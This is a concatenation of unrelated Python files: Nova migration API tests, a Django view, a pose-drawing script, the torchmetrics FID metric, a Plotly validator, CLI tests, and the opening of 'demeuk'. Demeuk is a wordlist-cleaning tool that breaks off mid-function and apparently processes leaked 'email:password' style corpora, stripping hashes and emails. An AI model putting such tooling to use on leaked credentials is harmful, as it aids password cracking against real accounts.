def test_show_migration_not_exist(self, m_get_instance, m_get_mig):
m_get_mig.side_effect = exception.MigrationNotFoundForInstance(
migration_id=migrations_obj[0].id,
instance_id=SERVER_UUID)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show,
self.req, SERVER_UUID,
migrations_obj[0].id)
m_get_instance.assert_called_once_with(self.context, SERVER_UUID,
expected_attrs=None,
cell_down_support=False)
@mock.patch('nova.compute.api.API.get')
def test_show_migration_invalid_instance(self, m_get_instance):
m_get_instance.side_effect = exception.InstanceNotFound(instance_id=1)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show,
self.req, SERVER_UUID,
migrations_obj[0].id)
m_get_instance.assert_called_once_with(self.context, SERVER_UUID,
expected_attrs=None,
cell_down_support=False)
class ServerMigrationsTestsV224(ServerMigrationsTestsV21):
wsgi_api_version = '2.24'
def setUp(self):
super(ServerMigrationsTestsV224, self).setUp()
self.req = fakes.HTTPRequest.blank('', version=self.wsgi_api_version,
use_admin_context=True)
self.context = self.req.environ['nova.context']
def test_cancel_live_migration_succeeded(self):
@mock.patch.object(self.compute_api, 'live_migrate_abort')
@mock.patch.object(self.compute_api, 'get')
def _do_test(mock_get, mock_abort):
self.controller.delete(self.req, 'server-id', 'migration-id')
mock_abort.assert_called_once_with(self.context,
mock_get.return_value,
'migration-id',
support_abort_in_queue=False)
_do_test()
def _test_cancel_live_migration_failed(self, fake_exc, expected_exc):
@mock.patch.object(self.compute_api, 'live_migrate_abort',
side_effect=fake_exc)
@mock.patch.object(self.compute_api, 'get')
def _do_test(mock_get, mock_abort):
self.assertRaises(expected_exc,
self.controller.delete,
self.req,
'server-id',
'migration-id')
_do_test()
def test_cancel_live_migration_invalid_state(self):
self._test_cancel_live_migration_failed(
exception.InstanceInvalidState(instance_uuid='',
state='',
attr='',
method=''),
webob.exc.HTTPConflict)
def test_cancel_live_migration_migration_not_found(self):
self._test_cancel_live_migration_failed(
exception.MigrationNotFoundForInstance(migration_id='',
instance_id=''),
webob.exc.HTTPNotFound)
def test_cancel_live_migration_invalid_migration_state(self):
self._test_cancel_live_migration_failed(
exception.InvalidMigrationState(migration_id='',
instance_uuid='',
state='',
method=''),
webob.exc.HTTPBadRequest)
def test_cancel_live_migration_instance_not_found(self):
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.delete,
self.req,
'server-id',
'migration-id')
class ServerMigrationsTestsV265(ServerMigrationsTestsV224):
wsgi_api_version = '2.65'
def test_cancel_live_migration_succeeded(self):
@mock.patch.object(self.compute_api, 'live_migrate_abort')
@mock.patch.object(self.compute_api, 'get')
def _do_test(mock_get, mock_abort):
self.controller.delete(self.req, 'server-id', 1)
mock_abort.assert_called_once_with(self.context,
mock_get.return_value, 1,
support_abort_in_queue=True)
_do_test()
def test_cancel_live_migration_in_queue_not_yet_available(self):
exc = exception.AbortQueuedLiveMigrationNotYetSupported(
migration_id=1, status='queued')
@mock.patch.object(self.compute_api, 'live_migrate_abort',
side_effect=exc)
@mock.patch.object(self.compute_api, 'get')
def _do_test(mock_get, mock_abort):
error = self.assertRaises(webob.exc.HTTPConflict,
self.controller.delete,
self.req, 'server-id', 1)
self.assertIn("Aborting live migration 1 with status queued is "
"not yet supported for this instance.",
six.text_type(error))
mock_abort.assert_called_once_with(self.context,
mock_get.return_value, 1,
support_abort_in_queue=True)
_do_test()
class ServerMigrationsPolicyEnforcementV21(test.NoDBTestCase):
wsgi_api_version = '2.22'
def setUp(self):
super(ServerMigrationsPolicyEnforcementV21, self).setUp()
self.controller = server_migrations.ServerMigrationsController()
self.req = fakes.HTTPRequest.blank('', version=self.wsgi_api_version)
def test_force_complete_policy_failed(self):
rule_name = "os_compute_api:servers:migrations:force_complete"
self.policy.set_rules({rule_name: "project:non_fake"})
body_args = {'force_complete': None}
exc = self.assertRaises(exception.PolicyNotAuthorized,
self.controller._force_complete, self.req,
fakes.FAKE_UUID, fakes.FAKE_UUID,
body=body_args)
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule_name,
exc.format_message())
class ServerMigrationsPolicyEnforcementV223(
ServerMigrationsPolicyEnforcementV21):
wsgi_api_version = '2.23'
def test_migration_index_failed(self):
rule_name = "os_compute_api:servers:migrations:index"
self.policy.set_rules({rule_name: "project:non_fake"})
exc = self.assertRaises(exception.PolicyNotAuthorized,
self.controller.index, self.req,
fakes.FAKE_UUID)
self.assertEqual("Policy doesn't allow %s to be performed." %
rule_name, exc.format_message())
def test_migration_show_failed(self):
rule_name = "os_compute_api:servers:migrations:show"
self.policy.set_rules({rule_name: "project:non_fake"})
exc = self.assertRaises(exception.PolicyNotAuthorized,
self.controller.show, self.req,
fakes.FAKE_UUID, 1)
self.assertEqual("Policy doesn't allow %s to be performed." %
rule_name, exc.format_message())
class ServerMigrationsPolicyEnforcementV224(
ServerMigrationsPolicyEnforcementV223):
wsgi_api_version = '2.24'
def test_migrate_delete_failed(self):
rule_name = "os_compute_api:servers:migrations:delete"
self.policy.set_rules({rule_name: "project:non_fake"})
self.assertRaises(exception.PolicyNotAuthorized,
self.controller.delete, self.req,
fakes.FAKE_UUID, '10')
|
from django.shortcuts import render
from . import apps
# Create your views here.
def get_home(request):
data = {}
data['news'] = {}
data['weather'] = {}
data['news']['sport1'] = apps.sport1reader()
data['news']['kicker'] = apps.kickerreader()
data['weather']['today'] = apps.weather()
return render(request,'news/news.html',context=data)
|
import json
import cv2
colors = [[255, 0, 0], [255, 85, 0], [255, 170, 0], [255, 255, 0], [170, 255, 0], [85, 255, 0],
[0, 255, 0], \
[0, 255, 85], [0, 255, 170], [0, 255, 255], [0, 170, 255], [0, 85, 255], [0, 0, 255],
[85, 0, 255], \
[170, 0, 255], [255, 0, 255], [255, 0, 170], [255, 0, 85]]
def get_viable(joints_data):
joints = []
jind = []
for i, ele in enumerate(joints_data):
joints.append((ele[0], ele[1]))
        if ele[2] > 0.1:
jind.append(i)
limbs = [0,0,1,2, 0,17,17,5,7,6, 8,17,17,11,13,12,14]
limbe = [1,2,3,4,17, 5, 6,7,9,8,10,11,12,13,15,14,16]
nwlimbs = []
nwlimbe = []
for a, b in zip(limbs, limbe):
        if a in jind and b in jind:
nwlimbs.append(a)
nwlimbe.append(b)
return joints, jind, nwlimbs, nwlimbe
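# A hedged illustration (not in the original script) of how get_viable filters: a joint
# index is kept only when its confidence is above 0.1, and a limb is kept only when both
# of its endpoints survive that filter. The toy keypoints below are made up.
def _example_get_viable():
    toy = [(10, 10, 0.9), (20, 20, 0.05)] + [(0, 0, 0.0)] * 16  # 18 keypoints, only index 0 confident
    joints, jind, limb_starts, limb_ends = get_viable(toy)
    assert jind == [0]
    assert limb_starts == [] and limb_ends == []  # no limb has both endpoints viable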
with open('output/alphapose-results.json') as f:
data = json.load(f)
for ele in data:
img = cv2.imread('output/' + ele['image_id'])
array = ele['keypoints']
joints_data = []
for i in range(len(array)//3):
joints_data.append((int(array[3*i]), int(array[3*i+1]), array[3*i+2]))
x = (joints_data[5][0] + joints_data[6][0])/2
y = (joints_data[5][1] + joints_data[6][1])/2
sc = (joints_data[5][2] + joints_data[6][2])/2
joints_data.append((int(x), int(y), sc))
joints, jind, limbs, limbe = get_viable(joints_data)
for i in jind:
cv2.circle(img, joints[i], 6, colors[i], thickness=-1)
for i in range(len(limbs)):
cv2.line(img, (joints[limbs[i]][0], joints[limbs[i]][1]), (joints[limbe[i]][0], joints[limbe[i]][1]), colors[i], thickness=3)
cv2.imwrite('output/' + ele['image_id'], img)
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Any, Callable, List, Optional, Union
import numpy as np
import torch
from deprecate import deprecated, void
from torch import Tensor
from torch.autograd import Function
from torchmetrics.metric import Metric
from torchmetrics.utilities import _future_warning, rank_zero_info, rank_zero_warn
from torchmetrics.utilities.data import dim_zero_cat
from torchmetrics.utilities.imports import _SCIPY_AVAILABLE, _TORCH_FIDELITY_AVAILABLE
if _TORCH_FIDELITY_AVAILABLE:
from torch_fidelity.feature_extractor_inceptionv3 import FeatureExtractorInceptionV3
else:
class FeatureExtractorInceptionV3(torch.nn.Module): # type: ignore
pass
__doctest_skip__ = ["FrechetInceptionDistance", "FID"]
if _SCIPY_AVAILABLE:
import scipy
class NoTrainInceptionV3(FeatureExtractorInceptionV3):
def __init__(
self,
name: str,
features_list: List[str],
feature_extractor_weights_path: Optional[str] = None,
) -> None:
super().__init__(name, features_list, feature_extractor_weights_path)
# put into evaluation mode
self.eval()
def train(self, mode: bool) -> "NoTrainInceptionV3":
"""the inception network should not be able to be switched away from evaluation mode."""
return super().train(False)
def forward(self, x: Tensor) -> Tensor:
out = super().forward(x)
return out[0].reshape(x.shape[0], -1)
class MatrixSquareRoot(Function):
"""Square root of a positive definite matrix.
All credit to: `Square Root of a Positive Definite Matrix`_
"""
@staticmethod
def forward(ctx: Any, input_data: Tensor) -> Tensor:
        # TODO: update whenever pytorch gets a matrix square root function
# Issue: https://github.com/pytorch/pytorch/issues/9983
m = input_data.detach().cpu().numpy().astype(np.float_)
scipy_res, _ = scipy.linalg.sqrtm(m, disp=False)
sqrtm = torch.from_numpy(scipy_res.real).to(input_data)
ctx.save_for_backward(sqrtm)
return sqrtm
@staticmethod
def backward(ctx: Any, grad_output: Tensor) -> Tensor:
grad_input = None
if ctx.needs_input_grad[0]:
(sqrtm,) = ctx.saved_tensors
sqrtm = sqrtm.data.cpu().numpy().astype(np.float_)
gm = grad_output.data.cpu().numpy().astype(np.float_)
# Given a positive semi-definite matrix X,
# since X = X^{1/2}X^{1/2}, we can compute the gradient of the
# matrix square root dX^{1/2} by solving the Sylvester equation:
            # dX = d(X^{1/2}) X^{1/2} + X^{1/2} d(X^{1/2}).
grad_sqrtm = scipy.linalg.solve_sylvester(sqrtm, sqrtm, gm)
grad_input = torch.from_numpy(grad_sqrtm).to(grad_output)
return grad_input
sqrtm = MatrixSquareRoot.apply
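# A hedged sanity check (not part of the metric implementation): for a symmetric
# positive definite matrix A, sqrtm(A) @ sqrtm(A) should reproduce A. The helper
# name and the toy matrix are made up; calling it requires scipy, as noted above.
def _example_check_sqrtm():
    a = torch.tensor([[4.0, 0.0], [0.0, 9.0]], dtype=torch.float64)
    root = sqrtm(a)  # expected to be diag(2, 3)
    assert torch.allclose(root @ root, a)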
def _compute_fid(mu1: Tensor, sigma1: Tensor, mu2: Tensor, sigma2: Tensor, eps: float = 1e-6) -> Tensor:
r"""
Adjusted version of `Fid Score`_
The Frechet Inception Distance between two multivariate Gaussians X_x ~ N(mu_1, sigm_1)
and X_y ~ N(mu_2, sigm_2) is d^2 = ||mu_1 - mu_2||^2 + Tr(sigm_1 + sigm_2 - 2*sqrt(sigm_1*sigm_2)).
Args:
mu1: mean of activations calculated on predicted (x) samples
sigma1: covariance matrix over activations calculated on predicted (x) samples
mu2: mean of activations calculated on target (y) samples
sigma2: covariance matrix over activations calculated on target (y) samples
eps: offset constant. used if sigma_1 @ sigma_2 matrix is singular
Returns:
Scalar value of the distance between sets.
"""
diff = mu1 - mu2
covmean = sqrtm(sigma1.mm(sigma2))
# Product might be almost singular
if not torch.isfinite(covmean).all():
rank_zero_info(f"FID calculation produces singular product; adding {eps} to diagonal of covariance estimates")
offset = torch.eye(sigma1.size(0), device=mu1.device, dtype=mu1.dtype) * eps
covmean = sqrtm((sigma1 + offset).mm(sigma2 + offset))
tr_covmean = torch.trace(covmean)
return diff.dot(diff) + torch.trace(sigma1) + torch.trace(sigma2) - 2 * tr_covmean
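# A hedged toy usage of _compute_fid (illustration only, not part of the library's
# tests): two identical Gaussians give a distance of zero, which follows directly
# from the formula in the docstring above. The helper name is made up.
def _example_compute_fid_zero():
    mu = torch.zeros(4, dtype=torch.float64)
    sigma = torch.eye(4, dtype=torch.float64)
    fid_value = _compute_fid(mu, sigma, mu.clone(), sigma.clone())
    assert torch.allclose(fid_value, torch.tensor(0.0, dtype=torch.float64), atol=1e-6)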
class FrechetInceptionDistance(Metric):
r"""
    Calculates Fréchet inception distance (FID_) which is used to assess the quality of generated images. Given by
.. math::
FID = |\mu - \mu_w| + tr(\Sigma + \Sigma_w - 2(\Sigma \Sigma_w)^{\frac{1}{2}})
where :math:`\mathcal{N}(\mu, \Sigma)` is the multivariate normal distribution estimated from Inception v3 [1]
features calculated on real life images and :math:`\mathcal{N}(\mu_w, \Sigma_w)` is the multivariate normal
distribution estimated from Inception v3 features calculated on generated (fake) images. The metric was
originally proposed in [1].
Using the default feature extraction (Inception v3 using the original weights from [2]), the input is
expected to be mini-batches of 3-channel RGB images of shape (3 x H x W) with dtype uint8. All images
    will be resized to 299 x 299 which is the size of the original training data. The boolean flag ``real``
determines if the images should update the statistics of the real distribution or the fake distribution.
    .. note:: using this metric requires you to have ``scipy`` installed. Either install as ``pip install
torchmetrics[image]`` or ``pip install scipy``
.. note:: using this metric with the default feature extractor requires that ``torch-fidelity``
is installed. Either install as ``pip install torchmetrics[image]`` or
``pip install torch-fidelity``
    .. note:: the ``forward`` method can be used but ``compute_on_step`` is disabled by default (opposite of
all other metrics) as this metric does not really make sense to calculate on a single batch. This
        means that by default ``forward`` will just call ``update`` underneath.
Args:
feature:
Either an integer or ``nn.Module``:
- an integer will indicate the inceptionv3 feature layer to choose. Can be one of the following:
64, 192, 768, 2048
- an ``nn.Module`` for using a custom feature extractor. Expects that its forward method returns
an ``[N,d]`` matrix where ``N`` is the batch size and ``d`` is the feature size.
compute_on_step:
            Forward only calls ``update()`` and returns ``None`` if this is set to ``False``.
dist_sync_on_step:
Synchronize metric state across processes at each ``forward()``
before returning the value at the step
process_group:
Specify the process group on which synchronization is called.
default: ``None`` (which selects the entire world)
dist_sync_fn:
Callback that performs the allgather operation on the metric state. When ``None``, DDP
will be used to perform the allgather
References:
[1] Rethinking the Inception Architecture for Computer Vision
Christian Szegedy, Vincent Vanhoucke, Sergey Ioffe, Jonathon Shlens, Zbigniew Wojna
https://arxiv.org/abs/1512.00567
[2] GANs Trained by a Two Time-Scale Update Rule Converge to a Local Nash Equilibrium,
Martin Heusel, Hubert Ramsauer, Thomas Unterthiner, Bernhard Nessler, Sepp Hochreiter
https://arxiv.org/abs/1706.08500
Raises:
ValueError:
If ``feature`` is set to an ``int`` (default settings) and ``torch-fidelity`` is not installed
ValueError:
If ``feature`` is set to an ``int`` not in [64, 192, 768, 2048]
TypeError:
If ``feature`` is not an ``str``, ``int`` or ``torch.nn.Module``
Example:
>>> import torch
>>> _ = torch.manual_seed(123)
>>> from torchmetrics.image.fid import FrechetInceptionDistance
>>> fid = FrechetInceptionDistance(feature=64)
>>> # generate two slightly overlapping image intensity distributions
>>> imgs_dist1 = torch.randint(0, 200, (100, 3, 299, 299), dtype=torch.uint8)
>>> imgs_dist2 = torch.randint(100, 255, (100, 3, 299, 299), dtype=torch.uint8)
>>> fid.update(imgs_dist1, real=True)
>>> fid.update(imgs_dist2, real=False)
>>> fid.compute()
tensor(12.7202)
"""
real_features: List[Tensor]
fake_features: List[Tensor]
higher_is_better = False
def __init__(
self,
feature: Union[int, torch.nn.Module] = 2048,
compute_on_step: bool = False,
dist_sync_on_step: bool = False,
process_group: Optional[Any] = None,
dist_sync_fn: Callable[[Tensor], List[Tensor]] = None,
) -> None:
super().__init__(
compute_on_step=compute_on_step,
dist_sync_on_step=dist_sync_on_step,
process_group=process_group,
dist_sync_fn=dist_sync_fn,
)
rank_zero_warn(
"Metric `FrechetInceptionDistance` will save all extracted features in buffer."
" For large datasets this may lead to large memory footprint.",
UserWarning,
)
if isinstance(feature, int):
if not _TORCH_FIDELITY_AVAILABLE:
raise ModuleNotFoundError(
"FrechetInceptionDistance metric requires that `Torch-fidelity` is installed."
" Either install as `pip install torchmetrics[image]` or `pip install torch-fidelity`."
)
valid_int_input = [64, 192, 768, 2048]
if feature not in valid_int_input:
raise ValueError(
f"Integer input to argument `feature` must be one of {valid_int_input}, but got {feature}."
)
self.inception = NoTrainInceptionV3(name="inception-v3-compat", features_list=[str(feature)])
elif isinstance(feature, torch.nn.Module):
self.inception = feature
else:
raise TypeError("Got unknown input to argument `feature`")
self.add_state("real_features", [], dist_reduce_fx=None)
self.add_state("fake_features", [], dist_reduce_fx=None)
def update(self, imgs: Tensor, real: bool) -> None: # type: ignore
"""Update the state with extracted features.
Args:
imgs: tensor with images feed to the feature extractor
real: bool indicating if imgs belong to the real or the fake distribution
"""
features = self.inception(imgs)
if real:
self.real_features.append(features)
else:
self.fake_features.append(features)
def compute(self) -> Tensor:
"""Calculate FID score based on accumulated extracted features from the two distributions."""
real_features = dim_zero_cat(self.real_features)
fake_features = dim_zero_cat(self.fake_features)
# computation is extremely sensitive so it needs to happen in double precision
orig_dtype = real_features.dtype
real_features = real_features.double()
fake_features = fake_features.double()
# calculate mean and covariance
n = real_features.shape[0]
mean1 = real_features.mean(dim=0)
mean2 = fake_features.mean(dim=0)
diff1 = real_features - mean1
diff2 = fake_features - mean2
cov1 = 1.0 / (n - 1) * diff1.t().mm(diff1)
cov2 = 1.0 / (n - 1) * diff2.t().mm(diff2)
# compute fid
return _compute_fid(mean1, cov1, mean2, cov2).to(orig_dtype)
class FID(FrechetInceptionDistance):
r"""
    Calculates Fréchet inception distance (FID_) which is used to assess the quality of generated images.
.. deprecated:: v0.7
Use :class:`torchmetrics.image.FrechetInceptionDistance`. Will be removed in v0.8.
Example:
>>> import torch
>>> _ = torch.manual_seed(123)
>>> fid = FID(feature=64)
>>> # generate two slightly overlapping image intensity distributions
>>> imgs_dist1 = torch.randint(0, 200, (100, 3, 299, 299), dtype=torch.uint8)
>>> imgs_dist2 = torch.randint(100, 255, (100, 3, 299, 299), dtype=torch.uint8)
>>> fid.update(imgs_dist1, real=True)
>>> fid.update(imgs_dist2, real=False)
>>> fid.compute()
tensor(12.7202)
"""
@deprecated(target=FrechetInceptionDistance, deprecated_in="0.7", remove_in="0.8", stream=_future_warning)
def __init__(
self,
feature: Union[int, torch.nn.Module] = 2048,
compute_on_step: bool = False,
dist_sync_on_step: bool = False,
process_group: Optional[Any] = None,
dist_sync_fn: Callable[[Tensor], List[Tensor]] = None,
) -> None:
void(feature, compute_on_step, dist_sync_on_step, process_group, dist_sync_fn)
|
import _plotly_utils.basevalidators
class OutsidetextfontValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(self, plotly_name="outsidetextfont", parent_name="icicle", **kwargs):
super(OutsidetextfontValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "Outsidetextfont"),
data_docs=kwargs.pop(
"data_docs",
"""
color
colorsrc
Sets the source reference on Chart Studio Cloud
for `color`.
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
            available on the system on which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on Chart Studio Cloud
for `family`.
size
sizesrc
Sets the source reference on Chart Studio Cloud
for `size`.
""",
),
**kwargs
)
|
"""Test cases for the console module."""
import logging
from website_checker import cli
def test_latency_subcommand_prints_usage(mock_click):
"""It prints the usage message with subcommand options."""
result = mock_click.invoke(cli.main, ["latency", "--help"])
assert "Usage: check latency [OPTIONS]" in result.output
assert "--url" in result.output
assert "--timeout" in result.output
assert "--threshold" in result.output
def test_latency_subcommand_invokes_latency_happy_path(
mock_click, mock_checks_latency, caplog
):
"""It invokes latency check and logs out pass."""
# arrange
mock_checks_latency.return_value = True
# act
with caplog.at_level(logging.INFO):
mock_click.invoke(cli.main, ["latency", "--url", "https://google.com"])
# assert
assert mock_checks_latency.called
assert "pass" in caplog.text
def test_latency_subcommand_invokes_latency_sad_path(
mock_click, mock_checks_latency, caplog
):
"""It invokes latency check and logs out failure."""
mock_checks_latency.return_value = False
with caplog.at_level(logging.INFO):
mock_click.invoke(cli.main, ["latency", "--url", "https://google.com"])
assert mock_checks_latency.called
assert "fail" in caplog.text
def test_latency_subcommand_raises_on_exception(
mock_click, mock_checks_latency, caplog
):
"""It invokes latency check and logs out exception."""
mock_checks_latency.side_effect = Exception("unknown error")
with caplog.at_level(logging.INFO):
mock_click.invoke(cli.main, ["latency", "--url", "https://google.com"])
assert '"error": "Exception(\'unknown error\')"' in caplog.text
assert "fail" in caplog.text
|
#!/usr/bin/env python3
"""
.. code-block:: none
Demeuk - a simple tool to clean up corpora
Usage:
demeuk [options]
Examples:
demeuk -i inputfile.tmp -o outputfile.dict -l logfile.txt
demeuk -i inputfile0*.txt -o outputfile.dict -l logfile.txt
demeuk -i inputdir/* -o outputfile.dict -l logfile.txt
demeuk -i inputfile -o outputfile -j 24
demeuk -i inputfile -o outputfile -c -e
demeuk -i inputfile -o outputfile --threads all
Standard Options:
-i --input <path to file> Specify the input file to be cleaned, or provide a glob pattern
-o --output <path to file> Specify the output file name.
    -l --log <path to file>           Optional, specify where the log file needs to be written to
    -j --threads <threads>            Optional, demeuk doesn't use threads by default. Specify the amount of
                                      threads to spawn. Specify the string 'all' to make demeuk auto-detect the
                                      amount of threads to start based on the number of CPUs.
                                      Note: threading will cost some setup time. Only speeds up for larger files.
--input-encoding <encoding> Forces demeuk to decode the input using this encoding.
    --output-encoding <encoding>      Forces demeuk to encode the output using this encoding (default: en_US.UTF-8).
    -v --verbose                      When set, the logfile will not only contain lines which caused an error, but
                                      also lines which were modified.
-n --limit <int> Limit the number of lines per thread.
--version Prints the version of demeuk.
Separating Options:
-c --cut Specify if demeuk should split (default splits on ':'). Returns everything
after the delimiter.
--cut-before Specify if demeuk should return the string before the delimiter.
When cutting, demeuk by default returns the string after the delimiter.
    -f --cut-fields <field>           Specifies the field to be returned; this follows the 'cut' field syntax:
                                      N for the N-th field, N- from the N-th field to the end of the line,
                                      N-M from the N-th to the M-th field, -M from the start to the M-th field.
-d --delimiter <delimiter> Specify which delimiter will be used for cutting. Multiple delimiters can be
specified using ','. If the ',' is required for cutting, escape it with a
backslash. Only one delimiter can be used per line.
Check modules (check if a line matches a specific condition):
--check-min-length <length> Requires that entries have a minimal requirement of <length> unicode chars
--check-max-length <length> Requires that entries have a maximal requirement of <length> unicode chars
--check-case Drop lines where the uppercase line is not equal to the lowercase line
--no-check-controlchar Disable the dropping of lines containing control chars.
--check-email Drop lines containing e-mail addresses.
--check-hash Drop lines containing hashes.
    --check-non-ascii                 If a line contains a non ascii char e.g. ü or ç (or anything outside the ascii
                                      range) the line is dropped.
Modify modules (modify a line in place):
--hex Replace lines like: $HEX[41424344] with ABCD.
    --html                            Replace HTML-encoded lines like: &#351;ifreyok with şifreyok.
    --html-named                      Replace lines with named HTML entities like &alpha;. Those structures are more
                                      like passwords, so be careful to enable this option.
--umlaut Replace lines like ko"ffie with an o with an umlaut.
--no-mojibake disable fixing mojibakes, useful if you know the encoding.
--no-encode disable guessing of encoding, this force to use the --input-encoding.
--no-tab disable replacing tab char with ':'
    --non-ascii                       Replace non ascii chars with their replacement letters. For example ü
                                      becomes u, ç becomes c.
Add modules (Modify a line, but keep the original as well):
--add-lower If a line contains a capital letter this will add the lower case variant
    --add-latin-ligatures             If a line contains a single ligature of a latin letter (such as ij), the
                                      corrected line is added to the output alongside the original line containing
                                      the ligature.
--add-split split on known chars like - and . and add those to the final dictionary.
    --add-umlaut                      In some spelling dicts, umlauts are sometimes written as: o" or i" and not as
                                      one char.
Remove modules (remove specific parts of a line):
--remove-punctuation Remove start and ending punctuation.
--remove-email Enable email filter, this will catch strings like
1238661:test@example.com:password
Macro modules:
-g --googlengram When set, demeuk will strip universal pos tags: like _NOUN_ or _ADJ
"""
from binascii import hexlify, unhexlify
from glob import glob
from hashlib import md5
from html import unescape
from inspect import cleandoc
from locale import LC_ALL, setlocale
from multiprocessing import cpu_count, Pool
from os import linesep, mkdir, path, walk
from re import compile as re_compile
from re import search
from re import split as re_split
from re import sub
from shutil import rmtree
from string import punctuation
from unicodedata import category
from chardet import detect
from docopt import docopt
from ftfy import fix_encoding
from ftfy.chardata import HTML_ENTITIES, HTML_ENTITY_RE
from ftfy.fixes import fix_latin_ligatures
from nltk import str2tuple
from nltk.tokenize import WhitespaceTokenizer
from unidecode import unidecode
version = '3.6.1'
HEX_REGEX = re_compile(r'\$HEX\[([0-9a-f]+)\]')
EMAIL_REGEX = '.{1,64}@([a-zA-Z0-9_-]*\\.){1,3}[a-zA-Z0-9_-]*'
HASH_HEX_REGEX = '^[a-fA-F0-9]+$'
HASH_LINUX_REGEX = '^\\$([0-9][aby]?|h)\\$[\\w\\.\\/]+(\\$[\\w\\.\\/]+)?'
def _unescape_fixup_named(match):
"""
Replace one matched HTML entity with the character it represents,
if possible.
Based on: ftfy.fixes._unescape_fixup
"""
text = match.group(0)
if text in HTML_ENTITIES:
return HTML_ENTITIES[text]
else:
return text
def _unescape_fixup(match):
"""
Replace one matched HTML entity with the character it represents,
if possible.
Based on: ftfy.fixes._unescape_fixup
"""
text = match.group(0)
if text.startswith('&#'):
unescaped = unescape(text)
# If html.unescape only decoded part of the string, that's not what
# we want. The semicolon should be consumed.
if ';' in unescaped:
return text
else:
return unescaped
else:
return text
def clean_googlengram(line):
"""Removes speechtags from line specific to the googlengram module
Param:
line (unicode)
Returns:
line (unicode)
"""
return_line = line.split("\t")[0] # Get the ngram, remove year, counter, etc
clean = []
words = WhitespaceTokenizer().tokenize(return_line)
for word in words:
# in >1-grams transitions to specific tags are written as:
# The_ADJ _NOUN_ (meaning from The there is a transition to a noun
# We remove those
if word[0] != '_' and word[-1] != '_':
# Split the token and the tag based on the '_'
token, tag = str2tuple(word, '_')
# Punct will be added using rules.
if len(token) > 1:
                if tag not in ('PUNCT', '.', ''):
clean.append(token)
elif token not in punctuation:
clean.append(token)
return_line = ' '.join(clean)
if return_line != line:
return True, return_line
else:
return False, line
def remove_email(line):
"""Removes e-mail addresses from a line.
Params:
line (unicode)
Returns:
line (unicode)
"""
if '@' in line:
if search(f'{EMAIL_REGEX}(:|;)', line):
return True, sub(f'{EMAIL_REGEX}(:|;)', '', line)
return False, line
def add_lower(line):
"""Returns if the upper case string is different from the lower case line
Param:
line (unicode)
Returns:
False if they are the same
Lowered string if they are not
"""
line_lower = line.lower()
if line != line_lower:
return line_lower
else:
return False
def add_latin_ligatures(line):
"""Returns the line cleaned of latin ligatures if there are any.
Param:
line (unicode)
Returns:
False if there are not any latin ligatures
Corrected line
"""
cleaned_line = fix_latin_ligatures(line)
if line != cleaned_line:
return cleaned_line
else:
return False
def clean_add_umlaut(line):
"""Returns the line cleaned of incorrect umlauting
Param:
line (unicode)
Returns:
Corrected line
"""
cleaned_line = line
umlaut_dict = {
'a"': 'ä',
'i"': 'ï',
'o"': 'ö',
'u"': 'ü',
'e"': 'ë',
'A"': 'Ä',
'I"': 'Ï',
'O"': 'Ö',
'U"': 'Ü',
'E"': 'Ë',
}
for letter in umlaut_dict.keys():
cleaned_line = cleaned_line.replace(letter, umlaut_dict.get(letter))
if line != cleaned_line:
return True, cleaned_line
else:
return False, line
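# A hedged example of clean_add_umlaut (made-up input): an ASCII letter followed by a
# double quote is rewritten to the single umlauted character.
def _example_clean_add_umlaut():
    assert clean_add_umlaut('ko"ffie') == (True, 'köffie')
    assert clean_add_umlaut('koffie') == (False, 'koffie')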
def remove_punctuation(line):
"""Returns the line without start and end punctuation
Param:
line (unicode)
Returns:
line without start and end punctuation
"""
return_line = line.strip(punctuation)
if return_line != line:
return True, return_line
else:
return False, line
def add_split(line, punctuation=[' ', '-', r'\.']):
"""Split the line on the punctuation and return elements longer then 1 char.
Param:
line (unicode)
Returns:
split line
"""
for p in punctuation:
if p in line:
return [i for i in re_split('|'.join(punctuation), line) if len(i) > 1]
return False
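# A hedged example of add_split (made-up input): the line is split on space, '-' and '.',
# and only fragments longer than one character are returned.
def _example_add_split():
    assert add_split('jean-pierre.de vries') == ['jean', 'pierre', 'de', 'vries']
    assert add_split('password') is False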
def check_case(line, ignored_chars=[' ', "'", '-']):
"""Checks if an uppercase line is equal to a lowercase line.
Param:
line (unicode)
ignored_chars list(string)
Returns:
        true if every char is a cased letter or an ignored char, otherwise False plus the offending char
"""
for c in line:
c = str(c)
if c.lower() == c.upper():
if c in ignored_chars:
continue
else:
return False, c
return True, None
def check_length(line, min=0, max=0):
"""Does a length check on the line
Params:
line (unicode)
min (int)
max (int)
Returns
true if length is ok
"""
status = True
if min and status:
status = len(line) >= min
if max and status:
status = len(line) < max
return status
def check_hash(line):
"""Check if a line contains a hash
Params:
line (unicode)
    Returns true if line does not contain a hash
"""
if search(HASH_HEX_REGEX, line):
if len(line) in [32, 40, 64]:
return False
if len(line) > 0:
if line[0] == '$':
if search(HASH_LINUX_REGEX, line):
return False
return True
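# A hedged illustration of check_hash (the sample strings are made up): hex strings with
# MD5/SHA-1/SHA-256 lengths and $-prefixed crypt-style strings are treated as hashes.
def _example_check_hash():
    assert check_hash('5f4dcc3b5aa765d61d8327deb882cf99') is False    # 32 hex chars, MD5-like
    assert check_hash('$1$abcdefgh$abcdefghijklmnopqrstuv') is False  # crypt-style hash
    assert check_hash('correct horse battery staple') is True         # ordinary passphrase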
def check_email(line):
"""Check if lines contain e-mail addresses with a simple regex
Params:
